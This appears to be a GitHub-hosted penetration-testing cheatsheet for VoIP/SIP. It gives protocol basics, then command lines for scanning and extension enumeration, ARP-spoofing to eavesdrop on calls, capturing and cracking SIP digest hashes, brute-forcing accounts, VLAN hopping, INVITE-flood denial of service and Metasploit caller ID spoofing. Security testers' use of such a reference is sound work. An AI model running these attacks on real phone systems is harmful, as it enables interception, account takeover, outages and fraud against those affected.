forked from dipsec/Cheatsheets-1
-
Notifications
You must be signed in to change notification settings - Fork 20
/
Copy pathCheatsheet_VOIP.txt
178 lines (113 loc) · 5.34 KB
/
Cheatsheet_VOIP.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
VOIP (SIP) Cheatsheet
--------------------------------
SIP usually uses ports 5060 TCP or UDP for unencrypted signaling or 5061 for encrypted transportation using TLS.
SIP is an ASCII based protocol which has some similar elements like in the HTTP protocol by using a Request/Response model. Much like an HTTP request from a browser a SIP client request is made using a SIP URI a user agent and a method/request. SIP uses e-mail like addresses format: user/phone@domain/ip A typical SIP URI looks like:
[+] SIP Requests / Methods
Request Description
INVITE Used to invite and account to participate in a call session.
ACK Acknowledge an INVITE request.
CANCEL Cancel a pending request.
REGISTER Register user with a SIP server.
OPTIONS Lists information about the capabilities of a caller.
BYE Terminates a session between two users in a call.
REFER Indicates that the recipient(identified by the Request URI) should contact a third party using the contact information provided in the request.
SUBSCRIBE The SUBSCRIBE method is used to request current state and state updates from a remote node.
NOTIFY The NOTIFY method is used to notify a SIP node that an event which has been requested by an earlier SUBSCRIBE method has occurred.
[+] An Example SIP “INVITE” Request:
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 192.168.1.102;rport;branch=z9hG4bKvbxaoqar
Max-Forwards: 70
To:
From: "NightRanger" ;tag=eihgg
Call-ID: hfxsabthoymshub@backtrack
CSeq: 649 INVITE
Contact:
Content-Type: application/sdp
Allow: INVITE,ACK,BYE,CANCEL,OPTIONS,PRACK,REFER,NOTIFY,SUBSCRIBE,INFO,MESSAGE
Supported: replaces,norefersub,100rel
User-Agent: Twinkle/1.2
Content-Length: 310
[+] SIP Responses
Response Description
1xx Informational responses, Request received and being
2xx Successful responses The action was successfully received, understood, and accepted.
3xx Redirection responses
4xx Request failure responses The request contains bad syntax or cannot be fulfilled at the server.
5xx Server failure responses The server failed to fulfill an apparently valid request.
6xx Global failure responses The request cannot be fulfilled at any server.
[+] SIP Call Between 2 Phones Example
The calling phone sends an invite.
The called phone sends back a response of 100 (Trying).
The called phone then starts to ring and sends a response of 180 (Ringing).
When the caller picks up the phone the called phone sends a response of 200 (OK).
The calling phone sends an ACK response.
Conversation begins via RTP.
When the caller hangs up the phone a BYE request is sent.
The calling phone responds with 200 (OK).
Information Gathering
---------------------
[+] SMAP - Simple scanner for SIP enabled devices.
./smap 192.168.1.104
./smap 192.168.1.130/24
./smap -O 192.168.1.104
./smap -l 192.168.1.104
./smap -d 192.168.1.104
[+] SIPSAK - Testing SIP enabled applications and devices using the OPTION request method only.
sipsak -vv -s sip:192.168.1.221
[+] SIPScan - Simple scanner for sip enabled hosts.
./sip-scan -i eth0 192.168.1.1-254
[+] SVMAP (SIPVicious)
./svmap.py 192.168.1.1-254
./svmap.py 192.168.1.1-254 --fp
Extensions Enumeration
----------------------
[+] Svwar - Enumerate extensions by using a range of extensions or using a dictionary file.
./svwar.py -e100-400 192.168.1.104
./svwar.py -e100-400 192.168.1.104 -m INVITE -v
[+] Enumiax - Enumerate Asterisk Exchange protocol usernames.
./enumiax -v -m3 -M3 192.168.1.104
./enumiax -d dict -v 192.168.1.104
Monitoring Traffic and Eavesdropping Phone calls
------------------------------------------------
Capturing SIP authentication (we will later discuss this topic in the attacking authentication section).
Eavesdropping users phone calls.
[+] Arp Poisoning using Arpspoof
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof –t victim gateway
arpspoof –t gateway victim
Capturing traffic and Eavesdropping using Wireshark
Capture Filter: not broadcast and not multicast and host <IP ADDRESS>
Wireshark: Decode captured VoIP calls data into playable audio format. This feature is under the Statistics -> VoIP Calls menu.
[+] Capturing SIP Authentication using SIPDump
SIPDump is a part of the SIPCrack tools suite, it allows performing a live capture of SIP authentication digest response or it can dump a previously captured sessions from a PCAP file.
./sipdump -i eth0
./sipdump -i eth0 auth.txt
./sipdump -p /root/registration.pcap auth.txt
[+] Cracking SIP Digest response hashes
./sipcrack -w sipass.txt auth.txt
[+] Brute forcing SIP Accounts
./svcrack.py -u200 -d wordlist.txt 192.168.1.104
./svcrack.py -u200 -r100000-999999 192.168.1.104
VLAN Hopping
------------
modprobe 8021q
[+] VoIP Hopper
./voiphopper -i eth0 -c 0
./voiphopper -i eth0 -v 20
Denial Of Service
-----------------
[+] Inviteflood - This tool can be used to flood a target with INVITE requests it can be used to target sip gateways/proxies and sip phones.
./inviteflood eth0 <target_extension> <target_domain> <target_ip number_of_packets>
Attacking VoIP Using Metasploit
-------------------------------
[+] Scanning SIP Enabled Devices
use auxiliary/scanner/sip/options
[+] Enumerating SIP extensions / Usernames
use scanner/sip/enumerator
set RHOSTS 192.168.1.104
set MINEXT 100
set MAXEXT 500
set PADLEN 3
[+] Spoofing Caller ID auxiliary
use voip/sip_invite_spoof